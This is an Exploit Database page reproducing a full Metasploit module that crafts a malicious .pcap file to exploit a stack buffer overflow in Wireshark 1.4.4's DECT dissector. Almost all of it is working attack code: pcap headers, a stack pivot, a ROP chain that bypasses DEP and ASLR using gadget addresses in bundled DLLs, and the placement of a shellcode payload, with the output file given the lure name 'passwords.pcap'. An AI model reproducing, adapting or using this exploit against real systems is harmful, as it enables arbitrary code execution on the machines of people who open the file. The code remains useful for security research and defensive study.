Wireshark 1.4.4 – ‘packet-dect.c’ Local Stack Buffer Overflow (Metasploit) (1)

• Exploit Database
• 167 阅读

• 作者： Metasploit
  日期： 2011-04-19
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17186/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178

  ## # $Id: wireshark_packet_dect.rb 12364 2011-04-19 07:53:58Z sinn3r $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking   include Msf::Exploit::FILEFORMAT   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a stack buffer overflow in Wireshark <= 1.4.4 When opening a malicious .pcap file in Wireshark, a stack buffer occurs, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR and works on XP, Vista & Windows 7. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;sickness&apos;, #found the vulnerabilitiy &apos;corelanc0d3r&apos;#rop exploit + msf module ], &apos;Version&apos;=> &apos;$Revision: 12364 $&apos;, &apos;References&apos; => [ [ &apos;URL&apos;, &apos;https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838&apos; ], [ &apos;URL&apos;, &apos;https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836&apos; ], [ &apos;URL&apos;, &apos;http://www.exploit-db.com/exploits/17185&apos; ], ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;process&apos;, }, &apos;Payload&apos;=> { &apos;Space&apos; => 936, &apos;DisableNops&apos; => &apos;True&apos;, }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;32-bit Windows Universal (Generic DEP & ASLR Bypass)&apos;, { &apos;OffSet&apos; => 1243, &apos;Ret&apos;=> 0x667c484d, #libgnutl pivot - tx Lincoln } ], ], &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => &apos;Apr 18 2011&apos;, &apos;DefaultTarget&apos;=> 0))   register_options( [ OptString.new(&apos;FILENAME&apos;, [ true, &apos;pcap file&apos;,&apos;passwords.pcap&apos;]), ], self.class) end def junk return rand_text(4).unpack("L")[0].to_i end   def exploit   print_status("Creating &apos;#{datastore[&apos;FILENAME&apos;]}&apos; file ...")   global_header = "\xd4\xc3\xb2\xa1"# magic_number global_header << "\x02\x00" # major version global_header << "\x04\x00" # minor version global_header << "\x00\x00\x00\x00" # GMT to local correction global_header << "\x00\x00\x00\x00" # accuracy global_header << "\xff\x7f\x00\x00" # snaplen global_header << "\x01\x00\x00\x00" # data link type   packet_header = "\x26\x32\xac\x4d"#timestamp seconds packet_header << "\xda\xfa\x00\x08" #timestamp microseconds packet_header << "\x04\x06\x00\x00" #nr of octets of packet in file packet_header << "\x04\x06\x00\x00" #actual size of packet (1540)   ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23"   print_status("Preparing payload")   pivot = [target.ret].pack(&apos;V&apos;)   # pvefindaddr rop &apos;n roll # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below rop_pivot = [ 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x64f9d5ec, # ADD ESP,0C # RET - libfontconfig-1.dll 0x618d7d0e, # RET <- don&apos;t count on this one ! 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x61C14268, # ADD ESP,24 # RETN - freetype6.dll 0xFFFFFFFF, # crash baby ! 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, ].pack("V*")   rop_gadgets = [ 0x6d7155cb, # PUSH ESP # POP EBX # POP EBP # RETN**[libpangoft2-1.0-0.dll] junk, 0x6d596e31, # MOV EAX,EBX # POP EBX # POP EBP # RETN**[libgio-2.0-0.dll] junk, junk, 0x61c14552, # POP EBX # RETN** [freetype6.dll] 0x00000800, # size - 0x800 should be more than enough 0x61c14043, # POP ESI # RETN** [freetype6.dll] 0x0000009C, 0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN**[libgio-2.0-0.dll] junk, junk, 0x68610a27, # XCHG EAX,EBP # RETN** [libglib-2.0-0.dll] 0x629445a6, # POP EAX # RETN** [libatk-1.0-0.dll] 0x62d9027c, # 0x6c385913, # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN** [libgdk-win32-2.0-0.dll] 0x617bc526, # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN** [libgtk-win32-2.0-0.dll] 0x64f8c692, # POP EDX # RETN** [libfontconfig-1.dll] 0x00000040, # 0x619638db, # POP ECX # RETN** [libgtk-win32-2.0-0.dll] 0x6536B010, # RW 0x618d7d0d, # POP EDI # RETN** [libgtk-win32-2.0-0.dll] 0x618d7d0e, # RET 0x64fa0c15, # POP EAX # RETN** [libfontconfig-1.dll] 0x618d7d0e, # RET 0x61963fdb, # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll] ].pack("V*")   pivot = [target.ret].pack(&apos;V&apos;)   buffer = rand_text(131) buffer << rop_pivot buffer << rop_gadgets   nops = make_nops(target[&apos;OffSet&apos;] - (buffer.length) - (payload.encoded.length))   buffer << nops buffer << payload.encoded buffer << pivot   filler = 1540 - buffer.length   buffer << rand_text(filler)   filecontent = global_header filecontent << packet_header filecontent << ptype filecontent << buffer   print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")   file_create(filecontent) end end